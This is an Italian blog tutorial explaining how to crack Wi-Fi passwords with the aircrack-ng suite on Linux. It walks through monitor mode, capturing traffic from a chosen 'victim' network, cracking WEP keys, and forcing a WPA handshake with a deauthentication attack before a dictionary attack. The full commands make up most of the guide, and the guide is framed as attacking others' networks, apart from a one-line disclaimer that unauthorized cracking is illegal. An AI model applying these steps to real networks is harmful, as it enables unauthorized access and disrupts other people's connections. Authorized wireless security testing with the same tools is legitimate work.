Come craccare una rete Wi-Fi con Aircrack-ng

Banner - Guida aircrack-ng

In questa guida vi spiegherò come craccare la password di una rete Wi-Fi utilizzando aircrack-ng e una distribuzione Linux.

Attenzione: prima di cominciare è importante specificare che craccare reti Wi-Fi senza autorizzazione è illegale! Non mi assumo nessuna responsabilità sull’uso che farete di questa guida.

Per cominciare:

Se non avete ancora una distribuzione Linux scaricatene una ed installatela. Troverete una nostra guida qui.

Installate aircrack-ng con questi semplici comandi da terminale:

  1. sudo apt-get update
  2. sudo apt-get install aircrack-ng

Adesso aircrack-ng dovrebbe essere installato e funzionante sul vostro PC.

Sempre da terminale, inserite questo codice:

  1. airmon-ng start wlan0

Questo comando creerà un’interfaccia di monitoraggio collegata alla vostra scheda wireless, permettendo così alla scheda wireless di esaminare tutti i pacchetti che stanno transitando nella vostra area.

Verificate il nome dell’interfaccia appena creata con il comando iwconfig (nel mio caso è wlan0mon).

Aircrack-ng - airmon-ng start wlan0

Aircrack-ng - iwconfig

Adesso potete cominciate a “pescare” i pacchetti con il seguente comando:

  1. airodump-ng <nome interfaccia>

Vi troverete davanti a questa schermata:

Aircrack-ng - airodump wlan0mon

Scegliete quale rete “attaccare” e copiatene il relativo BSSID.

Nota: Usate CTRL+C per fermare l’operazione.

Lanciate il seguente comando:

  1. airodump-ng -c <canale (solitamente 11)> --bssid <MAC Address vittima> -w <nome file dump> <nome interfaccia>

Nota: per quanto riguarda il canale, assicuratevi di scegliere lo stesso canale mostrato dal comando airodump-ng <nome interfaccia>.

Aircrack-ng - airodump

WEP

Se la rete che stavate attaccando è protetta con crittografia WEP, dopo aver raccolto abbastanza pacchetti, potrete lanciare il comando:

  1. aircrack-ng -b <MAC Address vittima> <nome file dump>.cap

E avrete subito la password che cercate!

WPA

Se invece la crittografia è WPA o WPA2 sarete costretti ad eseguire un “attacco a dizionario”.

Aspettate che il comando airodump-ng -c <canale, solutamente 11> –BSSID <MAC Address vittima> -w <nomefiledump> <nome interfaccia> catturi l’handshake della rete (questo comparirà in alto a destra):

Aircrack-ng - handshake

Nota: Se la cattura dell’handshake dovesse richiedere troppo tempo, potrete provare ad accelerarla eseguendo questo comando su un’altra finestra del terminale:

  1. aireplay-ng -0 50 -a <MAC address vittima> -c <MAC address con cui la vittima sta dialogando> <nome interfaccia>

Quando l’handshake sarà stato catturato, interrompete il comando precedente sempre con CTRL+C e lanciate questo:

  1. aircrack-ng -w <nome dizionario> -b <MAC address vittima> <nome file dump>.cap

Aspettate che tutte le password presenti nel dizionario siano testate, questa operazione potrebbe richiedere anche moltissimo tempo e molto probabilmente potrebbe non portare a nulla.

Aircrack-ng - aircrack

Tutto dipende da quanto completo è il vostro dizionario e quanto potente il vostro PC.

Nota: Potete trovare molti dizionari online più o meno completi, oppure crearne uno voi. In ogni caso, si tratta di semplici file di testo.

Se l’attacco dovesse risultare fruttuoso, vi troverete davanti a questa schermata:

Aircrack-ng - aircrack (2) (IMMAGINE DA SOSTITUIRE)

Con questo è tutto!

Alla prossima!

Nota finale: Se non fosse chiaro come i comandi vadano completati ecco un esempio di come dovrebbero apparire, in maniera completa, i comandi 3. e 6.:

  1. airodump-ng -c 11 --bssid XX:XX:XX:XX:XX:XX -w dump wlan0mon
  2. aircrack-ng -w /home/dizionari/dizionario.txt -b XX:XX:XX:XX:XX:XX dump.cap

Related Post

Matlio
About Matlio 19 Articles
Beh, in realtà non c’è molto da dire. Potrei cominciare dicendo che odio le bio! Di fatto anche i miei profili social ne sono pressoché sprovvisti. Comunque sia, sono appassionato di informatica e tecnologia in generale. Questo è il mio campo di studio da praticamente tutta la vita. Amo condividere le cose che, con il tempo e lo studio, ho imparato. Mi piace spaziare con gli argomenti e ho moltissimi interessi. Su questo blog mi troverete a scrivere ora una guida su come installare un sistema operativo, ora un articolo sull’ultimo videogioco della Bethesda, ora uno sull’ultimo film della Marvel. Mi auguro solo che i miei articoli possano aiutare qualcuno di voi a risolvere i piccoli problemi che avrete con il vostro PC. Mmmh, immagino che questo possa bastare.

1 Commento

Leave a Reply

L'indirizzo email non sarà pubblicato.




*